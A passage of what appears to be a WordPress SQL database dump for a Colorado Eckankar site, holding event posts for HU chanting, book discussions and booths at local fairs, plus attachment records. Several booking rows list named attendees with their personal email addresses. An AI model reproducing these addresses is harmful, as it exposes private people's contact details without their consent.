style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/295073552/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Wisdom on Solving Problems','','publish','closed','closed','','how-to-experience-gods-love-677','','','2023-08-04 07:46:32','2023-08-04 13:46:32','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268880',0,'mec-events','',0),(268888,0,'2023-08-12 10:52:20','2023-08-12 16:52:20','','','','publish','closed','closed','','268888','','','2023-08-12 10:52:20','2023-08-12 16:52:20','',0,'https://eckankar-colorado.org/nf_sub/268888/',0,'nf_sub','',0),(268889,0,'2023-08-12 16:57:17','2023-08-12 22:57:17','','','','publish','closed','closed','','268889','','','2023-08-12 16:57:17','2023-08-12 22:57:17','',0,'https://eckankar-colorado.org/nf_sub/268889/',0,'nf_sub','',0),(268890,1000081,'2023-08-13 10:30:00','2023-08-13 16:30:00','','Eileen Joy - eileenjoy12@gmail.com','','publish','closed','closed','','eileen-joy-eileenjoy12gmail-com-7','','','2023-08-13 10:30:00','2023-08-13 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268890',0,'mec-books','',0),(268891,1000003,'2023-08-13 10:30:00','2023-08-13 16:30:00','','Susan Haebig - sue2earth@msn.com','','publish','closed','closed','','susan-haebig-sue2earthmsn-com','','','2023-08-13 10:30:00','2023-08-13 16:30:00','',0,'https://eckankar-colorado.org/mec-books/susan-haebig-sue2earthmsn-com/',0,'mec-books','',0),(268892,0,'2023-08-13 12:41:49','2023-08-13 18:41:49','','','','publish','closed','closed','','268892','','','2023-08-13 12:41:49','2023-08-13 18:41:49','',0,'https://eckankar-colorado.org/nf_sub/268892/',0,'nf_sub','',0),(268912,15,'2023-08-15 20:38:06','2023-08-16 02:38:06','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Would you like to learn more about Eckankar?</strong></span><br>\r\n<span style=\"font-size: 14pt;\"><strong>Would you like to attend a fun and holistic educational event?</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will be hosting an Eckankar booth at the WholeExpo in Durango.</span><br>\r\n<span style=\"font-size: 14pt;\">We would love to meet you. We will be giving out free \"<em>Eck Wisdom\"</em>&nbsp;books on topics such as Past Lives, Dreams, Soul Travel, and other spiritual-related topics. Our booth will have a Wisdom Wheel that you can spin for a playful way to receive spiritual insights.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">One of our members will be giving a talk on Saturday called Loving Yourself First.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Expo brings together participants with conscious, holistic, and ecological perspectives to invest in the Earth, your spiritual life, and your health.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We hope to see you there!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\">\r\n<div></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/295462223/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Experiences Group at the WholeExpo - Durango','','publish','closed','closed','','title-goes-herein-person-discussion-meetup-template-990','','','2023-08-15 20:38:06','2023-08-16 02:38:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268912',0,'mec-events','',0),(268913,15,'2023-08-15 20:35:25','2023-08-16 02:35:25','','WholeExpo','','inherit','closed','closed','','wholeexpo','','','2023-08-15 20:35:25','2023-08-16 02:35:25','',268912,'https://eckankar-colorado.org/wp-content/uploads/2023/08/WholeExpo.webp',0,'attachment','image/webp',0),(268914,15,'2023-08-15 20:52:01','2023-08-16 02:52:01','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Open Your Heart &amp; Spiritual Eye with the HU Mantra</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU, an ancient mantra, has been practiced for thousands of years in one form or another for inner attunement. In the same way a musician can use a tuning fork to find the right pitch, the person singing HU tunes into a higher spiritual awareness.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">It works for all.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Have you reached out to the universe for love and answers?</strong></span><br>\r\n<span style=\"font-size: 14pt;\"><strong>Need help dealing with stress or fear?</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">HU offers balance, wisdom, and wonder. It brings alignment with your true purpose and highest good.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and a discussion after.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This free event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service, a spiritual resource for people of all faiths and beliefs. It is an individual, creative practice to experience our own unique relationship with the Divine.</span><br>\r\n<span style=\"font-size: 14pt;\">To read more about HU:&nbsp; <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">Sound of Soul</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span class=\"\" style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/295449558/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Passkey to the Inner Worlds','','publish','closed','closed','','how-to-experience-gods-love-677-953','','','2023-08-15 20:52:01','2023-08-16 02:52:01','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268914',0,'mec-events','',0),(268915,15,'2023-08-15 20:48:43','2023-08-16 02:48:43','','GoldenLightPerson','','inherit','closed','closed','','goldenlightperson','','','2023-08-15 20:48:43','2023-08-16 02:48:43','',268914,'https://eckankar-colorado.org/wp-content/uploads/2023/08/GoldenLightPerson.webp',0,'attachment','image/webp',0),(269314,0,'2023-10-29 11:49:40','2023-10-29 17:49:40','','','','publish','closed','closed','','269314','','','2023-10-29 11:49:40','2023-10-29 17:49:40','',0,'https://eckankar-colorado.org/nf_sub/269314/',0,'nf_sub','',0),(269315,0,'2023-10-29 16:03:06','2023-10-29 22:03:06','','','','publish','closed','closed','','269315','','','2023-10-29 16:03:06','2023-10-29 22:03:06','',0,'https://eckankar-colorado.org/nf_sub/269315/',0,'nf_sub','',0),(269316,0,'2023-10-29 18:40:24','2023-10-30 00:40:24','','','','publish','closed','closed','','269316','','','2023-10-29 18:40:24','2023-10-30 00:40:24','',0,'https://eckankar-colorado.org/nf_sub/269316/',0,'nf_sub','',0),(269368,0,'2023-11-06 19:34:33','2023-11-07 02:34:33','','','','publish','closed','closed','','269368','','','2023-11-06 19:34:33','2023-11-07 02:34:33','',0,'https://eckankar-colorado.org/nf_sub/269368/',0,'nf_sub','',0),(269369,0,'2023-11-08 09:34:45','2023-11-08 16:34:45','','','','publish','closed','closed','','269369','','','2023-11-08 09:34:45','2023-11-08 16:34:45','',0,'https://eckankar-colorado.org/nf_sub/269369/',0,'nf_sub','',0),(269370,0,'2023-11-09 19:39:05','2023-11-10 02:39:05','','','','publish','closed','closed','','269370','','','2023-11-09 19:39:05','2023-11-10 02:39:05','',0,'https://eckankar-colorado.org/nf_sub/269370/',0,'nf_sub','',0),(269371,0,'2023-11-11 10:26:07','2023-11-11 17:26:07','','','','publish','closed','closed','','269371','','','2023-11-11 10:26:07','2023-11-11 17:26:07','',0,'https://eckankar-colorado.org/nf_sub/269371/',0,'nf_sub','',0),(268615,1000085,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Allan B - allanborenstein@yahoo.com','','publish','closed','closed','','allan-b-allanborensteinyahoo-com','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268615',0,'mec-books','',0),(268616,1000022,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-10','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268616',0,'mec-books','',0),(268617,1000086,'2023-06-11 10:30:00','2023-06-11 16:30:00','','A Greenstreet - agstreet11@gmail.com','','publish','closed','closed','','a-greenstreet-agstreet11gmail-com','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268617',0,'mec-books','',0),(268618,1000087,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Marc Maqssengale - billybobvak@yahoo.com','','publish','closed','closed','','marc-maqssengale-billybobvakyahoo-com','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268618',0,'mec-books','',0),(268619,1000007,'2023-06-11 10:30:00','2023-06-11 16:30:00','','Marc massengale - billybobak@yahoo.com','','publish','closed','closed','','marc-massengale-billybobakyahoo-com-2','','','2023-06-11 10:30:00','2023-06-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268619',0,'mec-books','',0),(268620,2,'2023-06-11 14:24:02','2023-06-11 20:24:02','','2023-regional-brochure and registration-web','','inherit','closed','closed','','2023-regional-brochure-and-registration-web','','','2023-06-11 14:24:02','2023-06-11 20:24:02','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-brochure-and-registration-web.pdf',0,'attachment','application/pdf',0),(268623,2,'2023-06-18 10:36:51','2023-06-18 16:36:51','<div class=\"boldgrid-section bg-background-color color1-background-color color-1-text-contrast\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 22px; padding-top: 16px; border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-sas-webpromo-bk-1.jpg\'); background-size: cover; background-repeat: no-repeat; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-sas-webpromo-bk-1.jpg\">\r\n<div class=\"col-lg-8 col-md-12 col-sm-6 col-xs-12\" style=\"border-width: 0px; border-radius: 12px; padding-top: 1em; padding-bottom: 0em;\" data-alpha=\"0.38\">\r\n<div style=\"border-width: 0px;\" class=\"boldgrid-section\">\r\n<h2 class=\"color1-color bg-text-fx bg-text-fx-closeheavy\" style=\"text-transform: capitalize; font-size: 25px; border-width: 0px; font-family: Montserrat; font-weight: 400; margin-top: 0px; margin-bottom: -12px; box-shadow: #cecece 0px 0px 0px 0px inset; line-height: 28px; letter-spacing: 1px;\" data-font-style=\"\" data-font-family=\"Montserrat\" data-font-weight=\"400\"><strong>2023 Colorado/Utah Eckankar<br>\r\nRegional Soul Adventure Seminar<br>\r\n</strong></h2>\r\n<p class=\"\">&nbsp;</p>\r\n<h2 class=\"color1-color bg-text-fx bg-text-fx-closeheavy\" style=\"border-width: 0px; text-transform: capitalize; font-family: \'Kaushan Script\'; font-weight: 400; font-size: 38px; letter-spacing: 2px; font-style: normal; box-shadow: #cecece 0px 0px 0px 0px; text-align: left; margin-top: 12px;\" data-font-style=\"normal\" data-font-family=\"Kaushan Script\" data-font-weight=\"400\"><strong>Soul Travel:<br>\r\nAdventures in Higher Consciousness</strong></h2>\r\n<h2 class=\"color1-color bg-text-fx bg-text-fx-closeheavy\" style=\"text-transform: capitalize; font-size: 26px; border-width: 0px; font-family: Montserrat; font-weight: 400; margin-top: 20px; line-height: 24px; box-shadow: #cecece 0px 0px 0px 0px;\" data-font-style=\"\" data-font-family=\"Montserrat\" data-font-weight=\"400\"><strong>August 4th - 6th<br>\r\n</strong></h2>\r\n<h2 class=\"color1-color bg-text-fx bg-text-fx-closeheavy\" style=\"text-transform: capitalize; font-size: 18px; border-width: 0px; font-family: \'Montserrat\'; font-weight: 400; letter-spacing: 0px; margin-top: 17px; margin-bottom: 12px; line-height: 24px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-style=\"\" data-font-family=\"Montserrat\" data-font-weight=\"400\">ECK Temple of Colorado | 7100 W. Mississippi Avenue Lakewood, CO</h2>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px; margin-top: 27px; padding-right: 0em; margin-right: 0px;\"><a class=\"btn btn-color-1 btn-rounded btn-raised\" style=\"font-family: \'Montserrat\'; font-weight: 400; font-size: 16px; padding-left: 10px; padding-right: 10px;\" href=\"https://eckankarcolorado.regfox.com/2023-regional-soul-adventure-seminar\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Montserrat\" data-font-weight=\"400\" data-font-style=\"\">Member Registration&nbsp;Online</a> <a class=\"btn btn-color-1 btn-rounded btn-raised\" style=\"font-family: \'Montserrat\'; font-weight: 400; font-size: 16px; padding-left: 10px; padding-right: 10px;\" href=\"https://eckankarcolorado.regfox.com/2023-colorado-regional-eck-seminar-free-guest-registration\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Montserrat\" data-font-weight=\"400\" data-font-style=\"\">Free Guest Registration Online</a></p>\r\n<p class=\"\" style=\"font-size: 21px; font-weight: 600; font-family: \'Montserrat\'; color: #ffffff; box-shadow: #cecece 0px 0px 0px 0px; margin-bottom: -7px;\" data-font-weight=\"600\" data-font-family=\"Montserrat\" data-font-style=\"\">NOTE: Register Online or by Mail Before July 21</p>\r\n<p class=\"color1-color\" style=\"font-size: 19px; font-family: \'Montserrat\'; font-weight: 500;\" data-font-family=\"Montserrat\" data-font-weight=\"500\" data-font-style=\"\">After this date, we invite you to register at the door.</p>\r\n<p class=\"color1-color bg-text-fx bg-text-fx-closeheavy\" style=\"border-width: 0px; margin-top: 13px; padding-left: 0px; font-size: 20px; box-shadow: #cecece 0px 0px 0px 0px inset; margin-left: 0px;\"><a class=\"whitelink bg-text-fx bg-text-fx-closeheavy\" style=\"border-width: 0px; font-family: \'Montserrat\'; font-weight: 400; font-size: 19px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-registration-form-web.pdf\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Montserrat\" data-font-weight=\"400\" data-font-style=\"\"><i class=\"fa bg-inserted-icon fa-envelope-open-o\" style=\"font-size: 25px; border-width: 0px; color: #ffffff;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span>&nbsp; </i>Register By Mail</a> &nbsp;&nbsp;&nbsp;&nbsp; <i class=\"fa bg-inserted-icon fa-check-square-o\" style=\"font-size: 25px; border-width: 0px; color: #ffffff;\" aria-hidden=\"true\"> </i>&nbsp;<a class=\"whitelink bg-text-fx bg-text-fx-closeheavy\" style=\"font-family: \'Montserrat\'; font-weight: 400; font-size: 19px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-brochure-and-registration-web.pdf\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Montserrat\" data-font-weight=\"400\" data-font-style=\"\">Event Information</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','2023 Regional SA Seminar-Promo','','publish','closed','closed','','2023-regional-sa-seminar-promo','','','2023-07-18 21:42:53','2023-07-19 03:42:53','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=268623',0,'bg_block','',0),(268624,0,'2023-06-15 17:15:52','2023-06-15 23:15:52','','','','publish','closed','closed','','268624','','','2023-06-15 17:15:52','2023-06-15 23:15:52','',0,'https://eckankar-colorado.org/nf_sub/268624/',0,'nf_sub','',0),(268633,2,'2023-06-16 14:19:01','2023-06-16 20:19:01','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 37px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Spiritual gold awaits your discovery in the <em>Shariyat-Ki-Sugmad</em> book discussion.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The Shariyat is a sacred guidebook like no other. It holds living truth for your past, present, and future.&nbsp; Join the book discussion and practice the spiritual exercises for the Shariyat. Together, they can be a key to unlocking the secrets of their beauty and power in your daily life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will be referring to and using both&nbsp; The&nbsp;Shariyat -Ki-Sugmad, Book One and the &nbsp;Spiritual Exercises for the Shariyat, Book One. Please have these books available during class and as you study.</span></p>\r\n<p class=\"\" style=\"color: #1d5791;\"><strong><span style=\"font-size: 14pt;\">This event will be both In person at the ECK Temple of Colorado streamed live on Zoom. Please see the current ECK Temple of Colorado e-newsletter for Zoom login information.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Shariyat-Ki-Sugmad - Book One<br>Book Discussion','','publish','closed','closed','','shariyat-ki-sugmad-herespiritual-discussion','','','2023-06-16 14:31:56','2023-06-16 20:31:56','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268633',0,'mec-events','',0),(268634,2,'2023-06-16 14:14:41','2023-06-16 20:14:41','','shariyat-book-1','','inherit','closed','closed','','shariyat-book-1','','','2023-06-16 14:14:41','2023-06-16 20:14:41','',268633,'https://eckankar-colorado.org/wp-content/uploads/2023/06/shariyat-book-1.jpg',0,'attachment','image/jpeg',0),(268637,2,'2023-06-17 12:59:47','0000-00-00 00:00:00','','Homepage Carousel - Liquid View','','draft','closed','closed','','','','','2023-06-17 12:59:47','2023-06-17 18:59:47','',0,'https://eckankar-colorado.org/?post_type=mec_calendars&#038;p=268637',0,'mec_calendars','',0),(268639,2,'2023-06-17 20:33:38','2023-06-18 02:33:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will be hosting an ECKANKAR booth at the at the Highlands Street Fair in Denver. We invite you to stop by and say hello!<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Want to talk about your spiritual experiences? Or maybe you have questions about Dreams, Past Lives, or Soul Travel. We\'re always happy to chat!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Enjoy live music, food from local restaurants, great shopping and more. Best of all, the event is free! See you there!<br>\r\n</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Saturday, June 24, 2023, 10:00 a.m. - 7:00 p.m.<br>\r\n</span></strong><strong><span style=\"font-size: 14pt;\">Along 32nd Avenue, between Irving and Perry Streets</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Eckankar Booth - Highlands Street Fair in Denver','','publish','closed','closed','','eckankar-booth-highlands-street-fair-in-denver','','','2023-06-17 20:37:01','2023-06-18 02:37:01','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268639',0,'mec-events','',0),(268641,2,'2023-06-17 20:36:56','2023-06-18 02:36:56','','highlands-street-fair-2','','inherit','closed','closed','','highlands-street-fair-2','','','2023-06-17 20:36:56','2023-06-18 02:36:56','',268639,'https://eckankar-colorado.org/wp-content/uploads/2023/06/highlands-street-fair-2.jpg',0,'attachment','image/jpeg',0),(268643,2,'2023-06-18 09:58:52','2023-06-18 15:58:52','','2023 regional-registration-form-web','','inherit','closed','closed','','2023-regional-registration-form-web','','','2023-06-18 09:58:52','2023-06-18 15:58:52','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-registration-form-web.pdf',0,'attachment','application/pdf',0),(268644,0,'2023-06-18 10:27:24','2023-06-18 16:27:24','','','','publish','closed','closed','','268644','','','2023-06-18 10:27:24','2023-06-18 16:27:24','',0,'https://eckankar-colorado.org/nf_sub/268644/',0,'nf_sub','',0),(268645,2,'2023-06-18 10:29:32','2023-06-18 16:29:32','','2023-regional-brochure and GUEST-registration-web','','inherit','closed','closed','','2023-regional-brochure-and-guest-registration-web','','','2023-06-18 10:29:32','2023-06-18 16:29:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-regional-brochure-and-GUEST-registration-web.pdf',0,'attachment','application/pdf',0),(268810,0,'2023-07-23 10:54:33','2023-07-23 16:54:33','','','','publish','closed','closed','','268810','','','2023-07-23 10:54:33','2023-07-23 16:54:33','',0,'https://eckankar-colorado.org/nf_sub/268810/',0,'nf_sub','',0),(268811,2,'2023-07-23 13:11:46','2023-07-23 19:11:46','<div class=\"boldgrid-section\" style=\"background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/08/creamy-blue-bk.jpg\'); background-size: cover; background-repeat: no-repeat; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/08/creamy-blue-bk.jpg\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 76px; padding-bottom: 31px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">[fluentform id=\"4\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Initiator and ESA Scheduling Form','','publish','closed','closed','','eck-initiator-and-esa-scheduling-form','','','2023-08-18 09:03:18','2023-08-18 15:03:18','',79666,'https://eckankar-colorado.org/?page_id=268811',0,'page','',0),(268816,2,'2023-07-24 14:20:56','2023-07-24 20:20:56','','2023-regional-brochure --web display','','inherit','closed','closed','','2023-regional-brochure-web-display','','','2023-07-24 14:20:56','2023-07-24 20:20:56','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/07/2023-regional-brochure-web-display.pdf',0,'attachment','application/pdf',0),(268836,15,'2023-07-28 15:15:40','2023-07-28 21:15:40','','PurpleScape','','inherit','closed','closed','','purplescape','','','2023-07-28 15:15:40','2023-07-28 21:15:40','',268835,'https://eckankar-colorado.org/wp-content/uploads/2023/07/PurpleScape.webp',0,'attachment','image/webp',0),(268837,15,'2023-07-28 15:24:11','2023-07-28 21:24:11','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">How to Live Free from Karma and Rebirth.</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will have a discussion on the booklet <em>Karma and Reincarnation, How to Live Free from Karma and Rebirth</em>, by Harold Klemp, the leader of ECKANKAR. Booklets are free to newcomers. This will be held at the Manitou Springs Library, 515 Manitou Ave. (new location) at 1:00 pm. This discussion will be held for 3 weeks in a row, Aug. 9, 16, &amp; 23 at the same time and location. Everyone is welcome to come and share your viewpoints and insights on this spiritual topic.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofcs/events/295029905/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Karma and Reincarnation','','publish','closed','closed','','karma-and-reincarnation-2','','','2023-08-04 11:25:58','2023-08-04 17:25:58','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268837',0,'mec-events','',0),(268838,15,'2023-07-28 15:26:58','2023-07-28 21:26:58','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">How to Live Free from Karma and Rebirth.</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will have a discussion on the booklet <em>Karma and Reincarnation, How to Live Free from Karma and Rebirth</em>, by Harold Klemp, the leader of ECKANKAR. Booklets are free to newcomers. This will be held at the Manitou Springs Library, 515 Manitou Ave. (new location) at 1:00 pm. This discussion will be held for 3 weeks in a row, Aug. 9, 16, &amp; 23 at the same time and location. Everyone is welcome to come and share your viewpoints and insights on this spiritual topic.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofcs/events/295029909\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Karma and Reincarnation','','publish','closed','closed','','karma-and-reincarnation-3','','','2023-08-04 11:21:48','2023-08-04 17:21:48','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268838',0,'mec-events','',0),(268839,2,'2023-07-29 10:26:38','2023-07-29 16:26:38','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p><span style=\"font-size: 14pt;\">You are warmly invited to watch a 30 minute video presentation of a talk by Sri Harold Klemp, Spiritual Leader of Eckankar. Always uplifting and insightful, Harold’s talks can help you unravel some the perplexing mysteries of life and help you understand yourself as Soul, an infinite, eternal, spiritual being.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The talk will be followed by a discussion on the spiritual topics mentioned in the talk. Come and share your thoughts and insights with other like-minded individuals.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is open to all.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Recognizing God\'s Help in Your Life','','publish','closed','closed','','recognizing-gods-help-in-your-life','','','2023-07-29 10:26:38','2023-07-29 16:26:38','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268839',0,'mec-events','',0),(268840,2,'2023-07-29 10:23:10','2023-07-29 16:23:10','','looking at light-3','','inherit','closed','closed','','looking-at-light-3','','','2023-07-29 